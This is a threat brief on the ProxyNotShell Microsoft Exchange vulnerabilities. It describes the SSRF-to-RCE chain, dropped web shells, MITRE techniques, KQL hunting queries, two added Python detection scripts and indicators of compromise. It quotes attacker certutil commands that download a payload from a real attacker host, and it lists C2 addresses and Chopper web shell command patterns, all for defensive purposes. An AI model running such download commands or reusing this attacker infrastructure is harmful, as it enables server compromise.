Threat Brief ProxyNotShell (CVE-2022-41040 and CVE-2022-41082)


Executive Summary 

  • In August 2022, the Vietnamese cyber security company GTSC discovered new Microsoft Exchange zero-day vulnerabilities that lead to Remote Code Execution (RCE) when triggered on a victim server; the chain was named ProxyNotShell.
  • Exploitation of the ProxyNotShell 0day vulnerabilities is very similar to ProxyShell (CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207).
  • The 0day vulnerabilities were assigned CVE-2022-41040 and CVE-2022-41082 and rated critical and important respectively. The first, CVE-2022-41040, is a server-side request forgery (SSRF) vulnerability, while the second, CVE-2022-41082, allows remote code execution (RCE) when Exchange PowerShell is accessible to the attacker.
  • The 0day exploit does require authentication: CVE-2022-41040 enables an authenticated attacker to remotely trigger CVE-2022-41082. Authenticated access to the vulnerable Exchange Server is necessary to successfully exploit either vulnerability, and the two can be used separately.
  • After exploiting Microsoft Exchange Server, the threat actors used the China Chopper web shell to obtain remote and persistent access to the victims' Exchange Server. Microsoft security intelligence observed the attackers performing Active Directory reconnaissance and data exfiltration after the Initial Access phase.

Details of the Vulnerabilities

GTSC's researchers discovered the following URL requests in a customer's Microsoft Internet Information Services (IIS) logs:

The requests use the same format as the ProxyShell vulnerability.

The malicious URL requests appear to be identical to the ProxyShell requests seen last year. 

Attacks are being reported that exploit two zero-day vulnerabilities affecting Microsoft Exchange Server 2013, Exchange Server 2016 and Exchange Server 2019. The first, CVE-2022-41040, is a server-side request forgery (SSRF) vulnerability, while the second, CVE-2022-41082, allows remote code execution (RCE) when Exchange PowerShell is accessible to the attacker.

The researchers started debugging Exchange's de-compiled code to find the vulnerability and develop exploit code. Once they had uncovered the vulnerability and developed exploit code for the new zero-day, they submitted it to the Zero Day Initiative (ZDI) to work with Microsoft so that a patch could be prepared as soon as possible.

ZDI quickly verified and acknowledged the 2 bugs, with CVSS scores of 8.8 and 6.3.

ZDI confirmed acceptance of the submissions here as ZDI-CAN-18333 and ZDI-CAN-18802.

Attack Pattern and MITRE ATT&CK TTPs

According to GTSC, after the first successful exploitation of ProxyNotShell against a victim's Exchange Server, the threat actors dropped a web shell on the Exchange Server to gain remote access. The connection between attacker and victim ran through a legitimate forum site that was being used as a command and control (C2) server, 137.184.67[.]33.

137.184.67[.]33 – attacker command and control server

The threat actors also replaced the content of the file RedirSuiteServiceProxy.aspx with web shell content. RedirSuiteServiceProxy.aspx is a legitimate file name present on Exchange servers.

Written Web Shells and File Paths:

File Name                     File Path
RedirSuiteServiceProxy.aspx   C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth
Xml.ashx                      C:\inetpub\wwwroot\aspnet_client
pxh4HG1v.ashx                 C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth

An open source web shell called SharPyShell has been used in some of the attacks.

According to the GTSC team, the threat actors executed the command lines below to download malicious files onto the victim network:

(See the details about certutil.exe abuse at https://lolbas-project.github.io/lolbas/Binaries/Certutil/)

  • "cmd" /c cd /d "c:\\PerfLogs"&certutil.exe -urlcache -split -f http://206.188.196.77:8080/themes.aspx c:\perflogs\t
  • "cmd" /c cd /d "c:\\PerfLogs"&certutil.exe -urlcache -split -f https://httpbin.org/get c:\test

After the first exploitation, the threat actors were observed downloading second-stage malware under the "C:\PerfLogs\" or "C:\Users\Public\" paths and executing these files through WMIC. Some of the downloaded malicious files were used for credential dumping from LSASS.exe.

MITRE ATT&CK Map:

Technique Name                                              ID
Command and Scripting Interpreter: Windows Command Shell    T1059.003
Windows Management Instrumentation                          T1047
Server Software Component: Web Shell                        T1505.003
OS Credential Dumping: LSASS Memory                         T1003.001
Lateral Tool Transfer                                       T1570
Reflective Code Loading                                     T1620
Account Discovery                                           T1087
File and Directory Discovery                                T1083
Process Discovery                                           T1057

Threat Hunting Queries and Mitigations

Use this query to hunt for Chopper web shell activity:

DeviceProcessEvents
| where InitiatingProcessFileName =~ "w3wp.exe"
| where ProcessCommandLine has_any ("&ipconfig&echo", "&quser&echo", "&whoami&echo", "&c:&echo", "&cd&echo", "&dir&echo", "&echo [E]", "&echo [S]")

Use this query to hunt for suspicious files in Exchange directories:

DeviceFileEvents
| where Timestamp >= ago(7d)
| where InitiatingProcessFileName == "w3wp.exe"
| where FolderPath has "FrontEnd\\HttpProxy\\"
| where InitiatingProcessCommandLine contains "MSExchange"
| project FileName, FolderPath, SHA256, InitiatingProcessCommandLine, DeviceId, Timestamp
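The two queries above only run inside Microsoft Defender, so the following is an added, offline re-implementation of their logic (it is not GTSC's, Microsoft's or this brief's own code) run over constructed sample telemetry whose field names mirror the DeviceProcessEvents / DeviceFileEvents columns. It also adds one rule the brief does not state as a query, matching the certutil -urlcache -f download command lines listed earlier, and it shows a caveat of the second query: Xml.ashx under C:\inetpub\wwwroot\aspnet_client lies outside FrontEnd\HttpProxy\ and is not returned. The host name and timestamps are made up; the paths, file names, hashes and the certutil command line are the ones on this page.

```python
"""Offline re-implementation of the hunting queries above (added example)."""
from dataclasses import dataclass
from datetime import datetime, timedelta

# Command-line fragments from the Chopper query above.
CHOPPER_MARKERS = ("&ipconfig&echo", "&quser&echo", "&whoami&echo", "&c:&echo",
                   "&cd&echo", "&dir&echo", "&echo [E]", "&echo [S]")


@dataclass
class ProcessEvent:
    timestamp: datetime
    device_id: str
    initiating_process_file_name: str  # parent process; w3wp.exe is the IIS worker
    process_command_line: str


@dataclass
class FileEvent:
    timestamp: datetime
    device_id: str
    initiating_process_file_name: str
    initiating_process_command_line: str
    folder_path: str
    file_name: str
    sha256: str


def hunt_chopper(events):
    """First query: w3wp.exe spawning a command line with a China Chopper echo
    marker. =~ and has_any are case-insensitive in KQL, so compare lower-cased."""
    hits = []
    for e in events:
        if e.initiating_process_file_name.lower() != "w3wp.exe":
            continue
        cmd = e.process_command_line.lower()
        matched = [m for m in CHOPPER_MARKERS if m.lower() in cmd]
        if matched:
            hits.append((e.device_id, e.process_command_line, matched))
    return hits


def hunt_certutil_download(events):
    """Added rule (not a query from the brief): certutil -urlcache ... -f download
    launched by a command shell under the IIS worker process."""
    hits = []
    for e in events:
        cmd = e.process_command_line.lower()
        if (e.initiating_process_file_name.lower() == "w3wp.exe"
                and "certutil" in cmd and "-urlcache" in cmd and " -f " in cmd):
            hits.append((e.device_id, e.process_command_line))
    return hits


def hunt_exchange_file_writes(events, now, window=timedelta(days=7)):
    """Second query: files written by w3wp.exe under FrontEnd\\HttpProxy\\ within
    the window, projected to the same columns. == is case-sensitive in KQL,
    has and contains are not."""
    cutoff = now - window
    rows = []
    for e in events:
        if (e.timestamp >= cutoff
                and e.initiating_process_file_name == "w3wp.exe"
                and "frontend\\httpproxy\\" in e.folder_path.lower()
                and "msexchange" in e.initiating_process_command_line.lower()):
            rows.append((e.file_name, e.folder_path, e.sha256,
                         e.initiating_process_command_line, e.device_id, e.timestamp))
    return rows


# Constructed sample telemetry (host name and times are made up).
NOW = datetime(2022, 10, 5, 12, 0, 0)
EXCHANGE_AUTH_DIR = r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth"
OWA_POOL = 'w3wp.exe -ap "MSExchangeOWAAppPool"'

SAMPLE_PROCESS_EVENTS = [
    ProcessEvent(NOW, "exch01", "w3wp.exe",
                 'cmd.exe /c cd /d "C:\\inetpub\\wwwroot"&whoami&echo [S]'),
    ProcessEvent(NOW, "exch01", "w3wp.exe",
                 '"cmd" /c cd /d "c:\\\\PerfLogs"&certutil.exe -urlcache -split -f '
                 'http://206.188.196.77:8080/themes.aspx c:\\perflogs\\t'),
    ProcessEvent(NOW, "exch01", "explorer.exe", "notepad.exe readme.txt"),
]

SAMPLE_FILE_EVENTS = [
    # Web shell written under owa\auth yesterday: the query returns it.
    FileEvent(NOW - timedelta(days=1), "exch01", "w3wp.exe", OWA_POOL, EXCHANGE_AUTH_DIR,
              "pxh4HG1v.ashx", "c838e77afe750d713e67ffeb4ec1b82ee9066cbe21f11181fd34429f70831ec1"),
    # Same kind of write 30 days ago: outside the ago(7d) window.
    FileEvent(NOW - timedelta(days=30), "exch01", "w3wp.exe", OWA_POOL, EXCHANGE_AUTH_DIR,
              "errorEE.aspx", "be07bd9310d7a487ca2f49bcdaafb9513c0c8f99921fdf79a05eaba25b52d257"),
    # Xml.ashx under aspnet_client: not under FrontEnd\HttpProxy, so the query misses it.
    FileEvent(NOW, "exch01", "w3wp.exe", OWA_POOL, r"C:\inetpub\wwwroot\aspnet_client",
              "Xml.ashx", "c838e77afe750d713e67ffeb4ec1b82ee9066cbe21f11181fd34429f70831ec1"),
]

if __name__ == "__main__":
    for hit in hunt_chopper(SAMPLE_PROCESS_EVENTS):
        print("chopper:", hit)
    for hit in hunt_certutil_download(SAMPLE_PROCESS_EVENTS):
        print("certutil:", hit)
    for row in hunt_exchange_file_writes(SAMPLE_FILE_EVENTS, NOW):
        print("file write:", row)
```

Running it prints one Chopper hit, one certutil hit and one file write; the aspnet_client write is silently dropped, which is why a second sweep over C:\inetpub\wwwroot\aspnet_client (or widening the FolderPath filter) is worth adding to the file query.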

URL Rewrite Rule:

We strongly recommend that Exchange Server customers disable remote PowerShell access for non-admin users in their organization. Guidance on how to do this for a single user or multiple users is available here.

Indicators of Compromise (IOCs)

Webshell:

File Name: pxh4HG1v.ashx
Hash (SHA256): c838e77afe750d713e67ffeb4ec1b82ee9066cbe21f11181fd34429f70831ec1
Path: C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\pxh4HG1v.ashx

File Name: RedirSuiteServiceProxy.aspx
Hash (SHA256): 65a002fe655dc1751add167cf00adf284c080ab2e97cd386881518d3a31d27f5
Path: C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\RedirSuiteServiceProxy.aspx

File Name: RedirSuiteServiceProxy.aspx
Hash (SHA256): b5038f1912e7253c7747d2f0fa5310ee8319288f818392298fd92009926268ca
Path: C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\RedirSuiteServiceProxy.aspx

File Name: Xml.ashx (pxh4HG1v.ashx and Xml.ashx have the same contents)
Hash (SHA256): c838e77afe750d713e67ffeb4ec1b82ee9066cbe21f11181fd34429f70831ec1
Path: C:\inetpub\wwwroot\aspnet_client\Xml.ashx

File Name: errorEE.aspx
Hash (SHA256): be07bd9310d7a487ca2f49bcdaafb9513c0c8f99921fdf79a05eaba25b52d257
Path: C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\errorEE.aspx

Downloaded Malicious DLLs (SHA256):

074eb0e75bb2d8f59f1fd571a8c5b76f9c899834893da6f7591b68531f2b5d82
45c8233236a69a081ee390d4faa253177180b2bd45d8ed08369e07429ffbe0a9
9ceca98c2b24ee30d64184d9d2470f6f2509ed914dafb87604123057a14c57c0
29b75f0db3006440651c6342dc3c0672210cfb339141c75e12f6c84d990931c3
c8c907a67955bcdf07dd11d35f2a23498fb5ffe5c6b5d7f36870cf07da47bff2
76a2f2644cb372f540e179ca2baa110b71de3370bb560aca65dcddbd7da3701e

IP Address Used by Threat Actor:

125[.]212[.]220[.]48
5[.]180[.]61[.]17
47[.]242[.]39[.]92
61[.]244[.]94[.]85
86[.]48[.]6[.]69
86[.]48[.]12[.]64
94[.]140[.]8[.]48
94[.]140[.]8[.]113
103[.]9[.]76[.]208
103[.]9[.]76[.]211
104[.]244[.]79[.]6
112[.]118[.]48[.]186
122[.]155[.]174[.]188
125[.]212[.]241[.]134
185[.]220[.]101[.]182
194[.]150[.]167[.]88
212[.]119[.]34[.]11

URL:

hxxp://206[.]188[.]196[.]77:8080/themes.aspx

C2:

137[.]184[.]67[.]33
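To turn the file indicators above into a host check, here is an added example scanner (not code from the brief or from GTSC) that walks the directories named on this page, hashes every file and compares it with the SHA256 values listed. Because RedirSuiteServiceProxy.aspx is a legitimate file name whose content was replaced, a name-based check alone is not enough, so the scanner additionally flags any .aspx/.ashx handler modified within the last 7 days (the same window the file-event query uses), which also gives a lead on new variants whose hashes are not yet known. The Exchange path assumes the default install location; the demo() tree is constructed and contains no real web shell content.

```python
"""Hash- and mtime-based sweep of the directories named in the brief (added example)."""
import hashlib
import os
import tempfile
import time
from pathlib import Path

# SHA256 indicators copied from the IOC section above.
WEBSHELL_HASHES = {
    "c838e77afe750d713e67ffeb4ec1b82ee9066cbe21f11181fd34429f70831ec1",  # pxh4HG1v.ashx, Xml.ashx
    "65a002fe655dc1751add167cf00adf284c080ab2e97cd386881518d3a31d27f5",  # RedirSuiteServiceProxy.aspx
    "b5038f1912e7253c7747d2f0fa5310ee8319288f818392298fd92009926268ca",  # RedirSuiteServiceProxy.aspx
    "be07bd9310d7a487ca2f49bcdaafb9513c0c8f99921fdf79a05eaba25b52d257",  # errorEE.aspx
}
DLL_HASHES = {
    "074eb0e75bb2d8f59f1fd571a8c5b76f9c899834893da6f7591b68531f2b5d82",
    "45c8233236a69a081ee390d4faa253177180b2bd45d8ed08369e07429ffbe0a9",
    "9ceca98c2b24ee30d64184d9d2470f6f2509ed914dafb87604123057a14c57c0",
    "29b75f0db3006440651c6342dc3c0672210cfb339141c75e12f6c84d990931c3",
    "c8c907a67955bcdf07dd11d35f2a23498fb5ffe5c6b5d7f36870cf07da47bff2",
    "76a2f2644cb372f540e179ca2baa110b71de3370bb560aca65dcddbd7da3701e",
}
# Directories named in the brief; the Exchange path assumes the default install location.
DEFAULT_ROOTS = [
    r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth",
    r"C:\inetpub\wwwroot\aspnet_client",
    r"C:\PerfLogs",
    r"C:\Users\Public",
]
HANDLER_EXTENSIONS = {".aspx", ".ashx"}
RECENT_SECONDS = 7 * 86400  # same 7-day window as the file-event hunting query


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def scan(roots, ioc_hashes, now=None):
    """Return (path, sha256, reasons) for every file under roots that matches an
    indicator hash or is a recently modified web handler."""
    now = time.time() if now is None else now
    findings = []
    for root in roots:
        for dirpath, _, names in os.walk(root):  # a missing root simply yields nothing
            for name in names:
                p = Path(dirpath) / name
                try:
                    digest, mtime = sha256_file(p), p.stat().st_mtime
                except OSError:
                    continue
                reasons = []
                if digest in ioc_hashes:
                    reasons.append("sha256 matches a ProxyNotShell indicator")
                if p.suffix.lower() in HANDLER_EXTENSIONS and now - mtime < RECENT_SECONDS:
                    reasons.append("web handler modified within the last 7 days")
                if reasons:
                    findings.append((str(p), digest, reasons))
    return findings


def demo():
    """Constructed sample tree: a freshly planted handler (its hash is added to the
    indicator set to stand in for a real match), a month-old handler and a text
    file. Nothing here is real web shell content."""
    with tempfile.TemporaryDirectory() as tmp:
        auth = Path(tmp) / "owa" / "auth"
        auth.mkdir(parents=True)
        planted = auth / "pxh4HG1v.ashx"
        planted.write_bytes(b"<%@ WebHandler Language='C#' Class='Sample' %> constructed placeholder")
        old = auth / "logon.aspx"
        old.write_bytes(b"<html>constructed legitimate page</html>")
        month_ago = time.time() - 30 * 86400
        os.utime(old, (month_ago, month_ago))
        (Path(tmp) / "readme.txt").write_bytes(b"constructed text file")
        indicators = WEBSHELL_HASHES | DLL_HASHES | {sha256_file(planted)}
        return scan([tmp], indicators)


if __name__ == "__main__":
    results = scan(DEFAULT_ROOTS, WEBSHELL_HASHES | DLL_HASHES) if os.name == "nt" else demo()
    for path, digest, reasons in results:
        print(path, digest, "; ".join(reasons))
```

On a Windows host it sweeps the four directories from the brief; elsewhere it runs the constructed demo, which reports only the planted handler (both reasons) and stays quiet on the month-old page and the text file. A hit on the mtime rule alone is a lead to review, not proof of compromise: compare the file against a known-good Exchange install of the same build before acting on it.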
